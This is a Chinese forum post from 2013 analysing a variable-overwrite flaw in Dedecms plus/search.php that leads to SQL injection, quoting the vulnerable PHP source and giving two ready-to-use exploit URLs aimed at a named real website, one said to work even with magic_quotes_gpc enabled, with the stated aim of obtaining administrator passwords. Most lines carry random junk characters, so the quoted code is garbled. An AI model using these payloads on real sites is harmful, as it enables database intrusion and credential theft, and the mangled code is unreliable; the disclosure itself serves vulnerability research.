微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.! A9 Y1 ] z2 O. u5 g
作者: c4rp3nt3r@0x50sec.org
1 G) Y7 I1 u- y) vDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码." ^; U$ r! J% z) Z3 D
+ m1 Z" Q8 R# i% ]; ]黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
* K4 \1 v$ \! W1 g 1 @1 g& e' w3 N- w8 Z
============
, c) X5 ]% c- f" I% A; o7 \- [' ~ ; x( b/ T J _; i8 I8 s0 l
: `& Z o( r& V# ~" L- \
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.0 w# I- C9 x, Y1 h1 V
* H3 V% a! e5 ], u3 ?+ Y- Crequire_once(dirname(__FILE__).”/../include/common.inc.php”);
2 N0 C' F2 a Jrequire_once(DEDEINC.”/arc.searchview.class.php”);
& G' a3 r' ^8 a" W! g/ D+ p1 Y n: B1 n' e- X
' }5 D# ]' x; t! Z# V( s$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
/ x: k5 @/ V) l" P$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;* a A6 {' M: H+ o: J- U7 V
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;& X9 u% f* n+ ^/ m- H
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;" m" d/ J3 X- H3 G
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
( S A6 E$ d& X# Q$ [) ?/ n
" {* c0 x4 ~/ Q% Q$ N0 Cif(!isset($orderby)) $orderby=”;
6 E- B6 R9 }5 ^( }else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
# _3 _- T9 @' _/ X 9 }9 A4 G. N/ F) G$ K
# C v% _; F+ C1 E* E4 o
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;" e3 r3 K; M a# o# a% B& e
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);3 d) f* g7 w+ v' i, q
" f' h- E2 a: g8 yif(!isset($keyword)){9 C* o' g2 t, h; t2 R2 E4 B
if(!isset($q)) $q = ”;
% O$ F' m, n+ {0 H$ V* A $keyword=$q;
" w z" {) u- x6 n4 v$ w. K: W) O}
7 ?% E6 w- ?+ l9 l' M% g; T ) Y, `- a Z; e- O' w
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));* ^+ i8 K. b% }6 m4 W8 e
" L# I/ H1 z7 G: Z$ i* ~, g" m
//查找栏目信息3 Z! E0 O* J; Q; o
if(empty($typeid))' I* r' p% W D4 J( M9 i6 i3 `
{
' Z; X" A" c* [, v8 S& }$ A $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;0 d6 v8 J- F0 D! z; `
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
& ]4 [ z; T* @% o# M% K" u: C {
! w8 c- F# z7 E, l+ z $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
* o1 \ K1 S9 K" B8 L) `4 M8 R fwrite($fp, “<”.”?php\r\n”);
3 Q; P' E( }# n& `, O $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
$ ]# Z3 R' a+ J/ X $dsql->Execute();7 a: }# u3 e# \8 y( J1 }& o* ^8 C
while($row = $dsql->GetArray())8 d" F- U, K! i8 O: l
{* ~& T( q$ O' N$ d, l, V7 A
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
# h* F0 I8 r+ K- G }
8 ]2 U) S2 ^0 e6 d+ w8 ?8 Q! h fwrite($fp, ‘?’.'>’);
4 ~' t/ x' q3 [ fclose($fp);7 M. u; s* Z; `: Y" b, t
}
6 _2 R" U4 k/ r6 D a //引入栏目缓存并看关键字是否有相关栏目内容
3 S. H- u) |6 K- ?: }( ]: K require_once($typenameCacheFile);
- |' b8 R" u+ g! S$ M" J/ d//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
9 B- W- R9 j+ s7 F; P//+ N Z) G2 ^9 Y t
if(isset($typeArr) && is_array($typeArr))
# |, y( W' U3 g {
1 D) a- b- v9 Z foreach($typeArr as $id=>$typename)
( [$ e6 P7 R5 \: V2 B {1 ~- O- a, V8 E: N2 Q9 G/ `
7 H) F3 z2 l0 t- ^9 {3 w1 I& V <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过) m2 N, q; j0 \& v9 Z, J2 d
if($keyword != $keywordn)* b3 L/ F/ C" ?3 P- d
{
% S- ]8 Q" F$ [ $keyword = $keywordn;
0 N1 h$ S7 K: J* | <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
" w" b H& q6 o! U% e/ C# ~ break;
. C- h W# R" c }
* A! u8 k- f$ q0 M7 c9 f D }% [6 x7 W/ M* ]0 g# E) h" \
} g) K* U; T* l2 _( i6 e
}
9 }, T' q# @4 J6 g" Q然后plus/search.php文件下面定义了一个 Search类的对象 .+ J- S2 B4 c) y) _1 q
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
) T s/ u( ^- w7 m1 |0 ]$this->TypeLink = new TypeLink($typeid);# s3 r$ \- G1 l7 H9 N! `( z' }8 T
2 g& r% x" S7 e1 J+ ETypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.7 z, l" A* Z; c7 W, j
$ ?( M; S l' C: g9 }6 V( v2 `$ ^ o
class TypeLink
! ^2 s# k" b6 H{
! m3 F6 | n* @& s) H3 B4 _4 d8 g var $typeDir;0 z" K3 R5 e3 p: p0 w& q# t$ A
var $dsql;" d5 t& Y% O& Q5 s& f: x
var $TypeID;
+ x U* J; l& @5 h6 W6 h/ J var $baseDir;
* Q- z$ X% \/ v var $modDir;1 q2 R; \* F+ Y
var $indexUrl;
7 [; h9 a' f- z2 H; f! m var $indexName;
4 ]9 N* q g) N8 x, l; o s var $TypeInfos;
8 w; G D9 Y6 _1 d4 ~ var $SplitSymbol;
1 b b. _" H7 k, Y. ^- E1 r var $valuePosition;
7 c/ D$ t7 n% w" {9 p( m X( t var $valuePositionName;
: I1 J% M9 @' A* I: R var $OptionArrayList;//构造函数//////// N, {8 l9 O/ n6 e
//php5构造函数
5 M5 e% l0 l/ w) W7 c: R function __construct($typeid)( V. u6 E" j6 d& u- \, F
{( \* f9 |* X8 e* a" v9 X5 k1 M3 p
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
- }5 _+ d: o" A* I* _9 i; k3 w $this->indexName = $GLOBALS['cfg_indexname'];. U. e- T, _6 w6 A( X
$this->baseDir = $GLOBALS['cfg_basedir'];1 G& C' e( g4 m5 i5 X! i& N
$this->modDir = $GLOBALS['cfg_templets_dir'];
: b* b" T8 M& T0 W2 F8 G$ x% b $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];* i9 S- \$ F/ o- G z0 i0 z2 ]- v
$this->dsql = $GLOBALS['dsql'];
5 q$ M# i O" o3 B, V $this->TypeID = $typeid;
- K* B3 U" J% g& | $this->valuePosition = ”;
( J' l1 f0 d& @5 M# V- E: X W) R $this->valuePositionName = ”;
5 T y# h( s9 V( x $this->typeDir = ”;
# r) h$ k8 T5 g' D5 R. @# U $this->OptionArrayList = ”;& @% m& h1 T* |
+ ?3 A. C# p, V- U/ }6 d B0 R% [; P //载入类目信息
. i. W( k. o- ?+ J6 `- e0 v% T1 ` ! y; n% t9 J! Q0 e
<font color=”Red”>$query = “SELECT tp.*,ch.typename as2 T* S$ x% W. K6 H7 n" F) H0 o
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join4 A) \+ b# a* V2 h6 B5 _
`#@__channeltype` ch2 ]$ ]+ n# m4 z- W( T
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿& p1 c. y* Z: t7 ?
: p$ r" }4 H# x3 U" B8 p if($typeid > 0)( U! M1 S. ]/ B% Q5 }# j* L0 G3 J
{( i7 O. Z# c. n c5 i
$this->TypeInfos = $this->dsql->GetOne($query);
/ x( Z; K1 d- G6 R0 k) I3 v8 Q5 ~利用代码一 需要 即使magic_quotes_gpc = Off/ F) O) N( x7 S9 W
4 d' A" w2 }+ n
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title7 G( C1 [6 g- n6 U/ N1 a
3 r7 l# A% K3 I+ |
这只是其中一个利用代码… Search 类的构造函数再往下
+ w( S/ T. [/ R& U/ R8 g7 @ ( |5 S$ d3 ~ t9 d% {
……省略
9 O5 [0 u9 ]; p$ f# @# `( ]3 T$this->TypeID = $typeid;
% T( L' _5 U" ^# p) A4 F- n( R……省略4 d9 o% V& r4 @: f9 l
if($this->TypeID==”0″){
# } G2 L1 Z# u& S5 \; Z $this->ChannelTypeid=1;
7 G( S, ^, c; g n# \% \ }else{
* a/ ?# {) }$ F m% Z$ H, X $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
! ]6 w7 E9 c8 o$ t) w//现在不鸡肋了吧亲…) Z& W; Y& O f1 a) K6 u
$this->ChannelTypeid=$row['channeltype'];
6 b) d" M; g P( m 1 Q; k7 j: r5 V0 V( [4 i3 y
}
0 O. ^& F q, D' w利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.5 q. N9 N8 {& c3 B
1 n+ P! j- L" [# a6 o
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title5 O2 q) G2 M9 I. u+ [. N7 l
& x1 k* N( l9 l) T5 X
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
2 V) y* I# n: ]& \$ C |
发表于 2013-1-19 08:18:56
收藏
支持
反对